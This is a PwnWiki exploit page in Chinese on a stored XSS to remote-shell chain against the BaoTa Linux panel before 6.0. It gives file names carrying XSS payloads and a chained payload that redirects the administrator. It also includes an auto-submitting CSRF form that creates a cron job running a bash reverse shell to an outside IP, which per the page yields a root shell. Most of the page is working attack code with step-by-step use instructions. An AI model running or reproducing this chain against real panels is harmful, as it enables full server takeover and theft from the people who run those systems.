寶塔linux面板 6.0 存儲型XSS Getshell漏洞

From PwnWiki
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影響

寶塔Linux面板<6.0

漏洞利用

在web目錄下上傳一個文件名為<img src=x onerror="alert(1)">的文件 寶塔後台瀏覽文件,觸發payload

Get cookie: 

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://1.1.1.1:8888/crontab?action=AddCrontab" method="POST">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="type" value="minute-n" />
      <input type="hidden" name="where1" value="5" />
      <input type="hidden" name="hour" value="" />
      <input type="hidden" name="minute" value="" />
      <input type="hidden" name="week" value="" />
      <input type="hidden" name="sType" value="toShell" />
      <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
      <input type="hidden" name="sName" value="" />
      <input type="hidden" name="backupTo" value="localhost" />
      <input type="hidden" name="urladdress" value="" />
      <input type="hidden" name="save" value="" />
      <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
      <input type="hidden" name="urladdress" value="" />
      <input type="submit" id="a" value="Submit request" />
    </form>
  </body>
  <script>
    document.getElementById('a').click()
</script>
</html>

修改poc中的ip地址,上傳到test.com中,當寶塔管理員訪問這個頁面以後,會自動添加反彈shell的計劃任務

新建三個文件,文件名分別為: 

a<img src=x onerror="a=String.fromCharCode(47)">
b<img src=x onerror="b='.com'">
c<img src=x onerror="window.open(a+a+'test'+b)">

payload觸發以後會自動打開test.com網頁

將上一步CSRF的payload部署到test.com,管理員瀏覽文件的時候即可觸發,觸發後五分鐘會反彈shell(ROOT權限)

Retrieved from "https://pwnwiki.com/index.php?title=寶塔linux面板_6.0_存儲型XSS_Getshell漏洞&oldid=5959"